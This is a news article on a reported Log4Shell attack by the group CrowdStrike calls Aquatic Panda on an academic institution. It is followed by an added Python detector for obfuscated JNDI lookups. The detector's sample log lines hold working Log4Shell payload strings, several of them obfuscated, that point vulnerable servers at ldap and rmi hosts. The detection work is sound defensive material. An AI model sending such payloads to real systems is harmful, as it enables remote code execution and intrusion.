Chinese state-sponsored attackers targeted academic institution with modified Log4j exploit

30 Dec, 2021

Chinese state-sponsored hackers reportedly targeted a “large academic institution” with a modified version of the Log4j exploit, according to cyber security firm CrowdStrike. This is the latest in a string of attacks that adversaries around the world are reported to have carried out by exploiting the Log4j vulnerability in Apache's widely used Java logging library.

The Apache Log4j vulnerability, tracked as CVE-2021-44228 and known as Log4Shell, is a remote code execution flaw in Log4j, an open-source Java logging library: a crafted string that an application writes to its logs can trigger a JNDI lookup that fetches and runs attacker-supplied code. Because the library is embedded in a vast number of Java applications and services (one estimate cited at the time put its reach at nearly 30% of websites worldwide), Log4Shell has been rated among the most widespread security flaws to date, ranking alongside the biggest cyber attacks of recent years.


“As OverWatch disrupted the attack before Aquatic Panda could take action on their objectives, their exact intent is unknown. This adversary, however, is known to use tools to maintain persistence in environments so they can gain access to intellectual property and other industrial trade secrets,” said Param Singh, vice president of CrowdStrike’s OverWatch team, in an interview with VentureBeat.

Aquatic Panda is CrowdStrike's name for the alleged Chinese state-sponsored group. The group has reportedly been active since mid-2020 but is not as widely known as groups such as North Korea's notorious Lazarus Group.

Exploitation attempts have risen steadily since the flaw was disclosed. The vulnerability has been used to deliver a wide range of malware strains, and a Check Point report found that the number of variants of the original exploit string grew rapidly in the days after disclosure, as attackers obfuscated the malicious lookup to slip past simple pattern matching.


Google's security researchers have made the same point about why Log4j is so impactful: the breadth of affected software, combined with the many exploit variants that attackers continue to develop, means the overall blast radius of the Log4j vulnerability is very hard to determine.
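The variants Check Point counted and the blast-radius point above both come down to the same thing: attackers hide the `${jndi:...}` lookup behind Log4j's own nested-lookup syntax, so a detector that greps for the literal string misses most of them. The Python below is an added example, not code from the article, CrowdStrike, Check Point or Google. It normalises the common obfuscation tricks (nested `${lower:}`/`${upper:}` lookups, the `${::-x}` default-value trick, unresolvable lookups such as `${env:NaN:-x}`, and `${date:'x'}` literals) and then checks whether a JNDI lookup survives. The log lines, hostnames and addresses are constructed for the example.

```python
import re

# Constructed sample log lines for this example (not real traffic).
# 203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG_LINES = [
    # 0: the original, unobfuscated Log4Shell probe
    'GET /login HTTP/1.1 "User-Agent: ${jndi:ldap://198.51.100.23:1389/a}"',
    # 1: nested ${lower:} lookups rebuild "jndi" and "ldap" letter by letter
    'GET / HTTP/1.1 "X-Api-Version: ${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.5/x}"',
    # 2: ${::-c} is an empty variable whose default value is "c"
    'GET / HTTP/1.1 "User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.5/y}"',
    # 3: a lookup that cannot resolve (env:NaN) falls back to its default
    'GET / HTTP/1.1 "Referer: ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.7/q}"',
    # 4: obfuscation inside the jndi body, and a different scheme (rmi)
    'POST /api HTTP/1.1 "User-Agent: ${jndi:${lower:R}mi://203.0.113.9/z}"',
    # 5: benign line that merely contains a lookup-like token
    'GET /cart HTTP/1.1 "User-Agent: Mozilla/5.0 price=${amount}"',
    # 6: benign line with a real but harmless lookup
    'GET /health HTTP/1.1 "User-Agent: ${upper:probe}"',
]

# An innermost lookup: ${...} whose body contains no further $, { or }.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A fully resolved JNDI lookup, e.g. ${jndi:ldap://host/path}.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):(?://)?([^}]*)\}", re.IGNORECASE)


def _resolve_name(name):
    """Resolve the subset of Log4j lookups that attackers abuse for obfuscation.

    Returns the substituted text, or None when the lookup cannot be resolved
    offline (env, sys, bare variables, ...), mirroring what Log4j would do
    before falling back to a ':-' default.
    """
    if ":" not in name:
        return None  # bare variable such as ${amount}
    lookup, _, arg = name.partition(":")
    lookup = lookup.lower()
    if lookup == "lower":
        return arg.lower()
    if lookup == "upper":
        return arg.upper()
    if lookup == "date" and len(arg) >= 2 and arg[0] == arg[-1] == "'":
        return arg[1:-1]  # ${date:'j'} yields the quoted literal
    return None


def normalize_lookups(text, max_rounds=200):
    """Repeatedly resolve innermost lookups, leaving any ${jndi:...} intact."""
    for _ in range(max_rounds):
        replaced = False
        for m in _INNERMOST.finditer(text):
            body = m.group(1)
            if body.lower().startswith("jndi:"):
                continue  # keep the JNDI lookup so the detector can see it
            name, sep, default = body.partition(":-")
            value = _resolve_name(name)
            if value is None:
                # Unresolvable: use the default if one was given, otherwise a
                # placeholder that cannot be matched as a lookup again.
                value = default if sep else f"<unresolved:{name}>"
            text = text[: m.start()] + value + text[m.end():]
            replaced = True
            break
        if not replaced:
            break
    return text


def scan_line(line):
    """Return a finding dict if the line carries a JNDI lookup, else None."""
    normalized = normalize_lookups(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),
        "target": m.group(2),
        "normalized": normalized,
        "obfuscated": normalized != line,
    }


def scan(lines):
    """Return (line_number, finding) pairs for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            hits.append((n, finding))
    return hits


if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG_LINES):
        flag = "obfuscated" if finding["obfuscated"] else "plain"
        print(f"line {n}: {flag} {finding['scheme']} -> {finding['target']}")
```

The normalisation step is the part worth copying into a real detection rule: five of the seven constructed lines are flagged, and only the first of them contains the literal string `${jndi:`. The resolver deliberately does not evaluate `env:` or `sys:` lookups, which is fine for detection because a payload that depends on them still has to fall back to a `:-` default to spell out the lookup.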